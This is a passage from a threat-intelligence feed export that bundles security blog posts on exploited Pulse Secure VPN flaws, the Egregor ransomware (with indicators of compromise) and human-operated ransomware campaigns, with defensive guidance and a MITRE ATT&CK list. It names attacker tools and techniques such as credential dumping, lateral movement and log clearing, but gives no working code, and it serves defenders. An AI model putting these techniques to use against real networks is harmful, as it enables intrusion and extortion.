[blogpost](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) they discuss 4 variants. Interested parties can also find technical details and detections there.\n\n### Networking devices\n\nState sponsored cyber-attacks are often more about espionage than about monetary gain with the exception of sabotage against an enemy state. A big part of the espionage is getting hold of login credentials of those that have access to interesting secret information. Breaking into network devices in a way that can be used to extract login credential is an important strategy in this secret conflict. Keep in mind that attribution is always hard and tricky. You may end up reaching the conclusion they wanted you to reach. Given the targets and the methodology however, it makes sense in this case to look first at state sponsored threat actors.\n\n### Update May 4th\n\nThe Pulse Secure team released a security update to address the issue outlined in [Security Advisory SA44784 (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) impacting the Pulse Connect Secure appliance. It is recommend that customers act urgently to apply the update to ensure they are protected. On that note, Pulse Secure also recommends that customers use the Pulse Security Integrity Checker Tool, a tool for customers to identify malicious activity on their systems, and that they continue to apply and follow recommended guidance for all available security patches.\n\nThe post [Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T18:12:15", "type": "malwarebytes", "title": "Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T18:12:15", "id": "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-15T20:23:18", "description": "### What is Egregor?\n\nEgregor ransomware is a relatively new ransomware (first spotted in September 2020) that seems intent on making its way to the top right now. Egregor is considered a variant of [Ransom.Sekhmet](<https://blog.malwarebytes.com/detections/ransom-sekhmet/>) based on similarities in obfuscation, API-calls, and the ransom note.\n\nAs we&#x27;ve reported in the past, affiliates that were using Maze ransomware started moving over to Egregor even before the [Maze gang officially announced they were calling it quits](<https://blog.malwarebytes.com/ransomware/2020/11/maze-ransomware-gang-announces-retirement/>). Egregor has already targeted some well-known victims like Barnes &amp; Noble, Kmart and Ubisoft.\n\n### How does Egregor spread?\n\nThe primary distribution method for Egregor is Cobalt Strike. Targeted environments are initially compromised through various means ([RDP probing](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/brute-force-attacks-increasing/>), [phishing](<https://blog.malwarebytes.com/glossary/phishing/>)) and once the [Cobalt Strike](<https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/>) beacon payload is established and persistent, it is then used to deliver and launch the Egregor payloads.\n\n_First part of the _Egregor ransom note\n\nBut since Egregor is a ransomware-as-a-service (RaaS) operation with multiple affiliates, the delivery and weaponization tactics can vary. We&#x27;ve also seen it being spread via phishing emails recently. The attack typically unfolds in two steps: initial compromise with email lure that drops [Qakbot](<https://blog.malwarebytes.com/detections/worm-qakbot/>), followed by the actual Egregor ransomware. The latter is deployed manually by the attackers who have previously gained access as a result of the initial compromise.\n\n\n\nThere have also been some reports of Egregor utilizing [CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>) (a remote code execution flaw in Microsoft Exchange). Some sources also report the possible exploitation of [CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>) (VBScript Engine), [CVE](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878>)[-2018-4878](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878>) (Adobe Flash Player), and [CVE-2018-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982>) (Adobe Flash Player).\n\nThe most common attack method seems to entail an initial spray-and-pray tactic, after which the threat actors make a selection of the available openings. They will obviously go for the easiest and most profitable ones based on primary reconnaissance data from the first stage of the attack. They will then try to enlarge their foothold on the breached network and look for the data and servers that are most critical for the victim. This will give the attackers extra leverage and a bigger chance to cash in their ransom demand.\n\nEgregor does not seem to have a geographical preference, even though Sekhmet has seemed to focus on the US in the past 7 weeks.\n\n_Sekhmet attacks in the last 7 weeks per country_\n\n### Egregor threatens to leak exfiltrated data\n\nAccording to the ransom note, if the ransom is not paid by the company within 3 days, and aside from leaking part of the stolen data, the attackers will announce the breach through mass media so the company&#x27;s partners and clients will know that the company was victimized.\n\n_Part 2 of the Egregor ransom note_\n\nIn all three the cases we mentioned earlier, the attackers published information on a leak site showing that they had accessed files during the attack, but didn&#x27;t necessarily reveal source code or anything particularly sensitive.\n\n_Announcements of leaked data on the Egregor website_\n\n### Education by the hands-on experts\n\nA very typical trait of the Egregor ransomware is that the attackers offer to educate their victims in order to help them escape future attacks.\n\n_Part 3 of the Egregor ransom note_\n\nCybersecurity advice is promised to those victims that pay the ransom as an extra bonus. What these recommendations look like is unknown at the time of writing. A truthful explanation about how the victim in question was infected, infiltrated, and how data was exfiltrated would certainly help in a forensic investigation of the incident.\n\n### Egregor victim Randstad\n\nOne of the latest victims seems to be Netherlands-based Randstad, one of the largest recruitment- and head-hunting agencies in the world. In its [press release](<https://tools.eurolandir.com/tools/Pressreleases/GetPressRelease/?ID=3845464&lang=en-GB&companycode=nl-rand&v=ticker>), Randstad specifically calls out Egregor as the attacker.\n\n\u201cWe believe the incident started with a phishing email that initiated malicious software to be installed,\u201d a Randstad spokesperson said in an email.\n\n_The listing on the Egregor site confirms the attack_\n\nThe press release confirms the stolen data but is unclear about the exact content.\n\n> \u201cTo date, our investigation has revealed that the Egregor group obtained unauthorized and unlawful access to our global IT environment and to certain data, in particular related to our operations in the US, Poland, Italy and France. They have now published what is claimed to be a subset of that data.\u201d\n\nDepending on the stolen data, and given the line of business, the content could be very sensitive and confidential. According to Randstad, the company was able to limit the impact, and the stolen data are in particular related to their operations in the US, Poland, Italy and France.\n\nThird party cybersecurity and forensic experts were engaged to assist with the investigation and remediation of the incident.\n\n### IOCs\n\n**Tor Onion URLs:**\n\n * egregorwiki.top\n * wikiegregor.top\n * sekhmet.top\n * sekhmetleaks.top\n\n**SHA256 hashes:**\n\n * 4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321\n * aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7\n\n**Ransom note:**\n\nRECOVER-FILES.txt (some parts of the ransom note can be seen in the article)\n\nThe post [Threat profile: Egregor ransomware is making a name for itself](<https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-15T13:58:58", "type": "malwarebytes", "title": "Threat profile: Egregor ransomware is making a name for itself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174", "CVE-2020-0688"], "modified": "2020-12-15T13:58:58", "id": "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "href": "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 